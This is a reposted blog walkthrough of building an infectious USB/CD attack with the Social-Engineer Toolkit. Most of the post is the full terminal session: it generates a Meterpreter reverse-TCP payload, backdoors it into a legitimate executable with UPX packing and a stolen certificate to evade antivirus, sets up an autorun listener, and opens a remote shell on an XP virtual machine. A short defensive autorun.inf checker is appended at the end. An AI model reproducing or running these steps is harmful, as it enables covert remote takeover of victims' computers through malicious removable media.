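Infectious Media Generator: Success
Source: Internet | Published by: Mobile Music Editing Software | Editor: Programmer Blog Network (程序博客网) | Time: 2024/06/03 23:16
It failed just now, so I rolled the BT5 virtual machine back to an earlier snapshot and ran through it again, and this time it succeeded: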
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ./set
Copyright 2012, The Social-Engineer Toolkit (SET) by TrustedSec, LLC
All rights reserved.

Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

    * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer
      in the documentation and/or other materials provided with the distribution.
    * Neither the name of Social-Engineer Toolkit nor the names of its contributors may be used to endorse or promote products derived from
      this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit
is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever
see the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Author
holds the right to refuse the hug or the beer.

The Social-Engineer Toolkit is designed purely for good and not evil. If you are planning on using this tool for malicious purposes that are
not authorized by the company you are performing assessments for, you are violating the terms of service and license of this toolset. By hitting
yes (only one time), you agree to the terms of service and that you will only use this tool for lawful purposes only.

Do you agree to the terms of service [y/n]: y

  [---]        The Social-Engineer Toolkit (SET)         [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]        Development Team: Thomas Werth            [---]
  [---]        Development Team: Garland                 [---]
  [---]                  Version: 3.6                    [---]
  [---]          Codename: 'MMMMhhhhmmmmmmmmm'           [---]
  [---]        Report bugs: davek@trustedsec.com         [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]       Homepage: https://www.trustedsec.com       [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    Join us on irc.freenode.net in channel #setoolkit

  The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Update SET configuration
   7) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 3

 The Infectious USB/CD/DVD module will create an autorun.inf file and a
 Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
 run if autorun is enabled.

 Pick the attack vector you wish to use: fileformat bugs or a straight executable.

   1) File-Format Exploits
   2) Standard Metasploit Executable

  99) Return to Main Menu

set:infectious>2
set:payloads> Enter the IP address for the payload (reverse):192.168.1.11

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

set:payloads>2

Below is a list of encodings to try and bypass AV.

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

set:encoding>16
set:payloads> PORT of the listener [443]:
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate
[*] Your attack has been created in the SET home directory folder 'autorun'
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
[-] The payload can be found in the SET home directory.
set> Start the listener now? [yes|no]: yes
[-] Please wait while the Metasploit listener is loaded...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

[*] Processing src/program_junk/meta_config for ERB directives.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
AutoRunScript => migrate -f
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
I loaded the generated ISO file into the XP virtual machine and successfully got a reverse connection:
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1044) at 2013-04-28 03:49:03 -0400
[*] Session ID 1 (192.168.1.11:443 -> 192.168.1.142:1044) processing AutoRunScript 'migrate -f'
[*] Current server process: program.exe (128)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1620
[+] Successfully migrated to process
Then I got a shell:
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3  192.168.1.11:443 -> 192.168.1.142:1044 (192.168.1.142)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : ROOT-9743DD32E3
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Meterpreter     : x86/win32
meterpreter > shell
Process 168 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

D:\>dir
dir
 驱动器 D 中的卷是 20130629_225554
 卷的序列号是 8C1E-0534

 D:\ 的目录

2013-04-28  15:42                46 autorun.inf
2013-04-28  15:42           222,592 program.exe
               2 个文件        222,638 字节
               0 个目录              0 可用字节

D:\>
It worked.
The XP machine shows the following:
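A defender-side check for the media layout seen in the `dir` output above (an `autorun.inf` sitting next to `program.exe`), added here as an example and not part of the original post: it parses an `autorun.inf` and reports every directive that launches a program, and whether the target ships on the same media. The sample file contents, the extension list and all function names are assumptions; the post does not show what its `autorun.inf` contains.

```python
import ntpath

# Extensions treated as directly runnable on Windows (an assumption for this example).
EXEC_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js", ".lnk")

# Constructed sample; the post does not show the contents of its autorun.inf.
SAMPLE_AUTORUN = r"""[AutoRun]
; constructed comment line
open=program.exe
icon=autorun.ico
shell\open\command=program.exe /quiet
label=Documents
"""
SAMPLE_LISTING = ["autorun.inf", "program.exe"]  # file names as in the post's dir output

def parse_autorun(text):
    """Return {key: value} from the [autorun] section (names are case-insensitive)."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def target_of(command):
    """First token of a command line, honouring a leading double-quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(None, 1)[0] if command else ""

def audit_media(autorun_text, listing):
    """Report each directive that launches a program and whether it ships on the media."""
    present = {ntpath.normpath(p).lstrip("\\").lower() for p in listing}
    findings = []
    for key, command in parse_autorun(autorun_text).items():
        if key in ("open", "shellexecute") or (
                key.startswith("shell\\") and key.endswith("\\command")):
            target = ntpath.normpath(target_of(command)).lstrip("\\").lower()
            findings.append({"directive": key, "command": command,
                             "target_on_media": target in present,
                             "executable_type": target.endswith(EXEC_EXTS)})
    return findings
```

On the endpoint itself, the matching control is the `NoDriveTypeAutoRun` policy value, which turns AutoRun off per drive type.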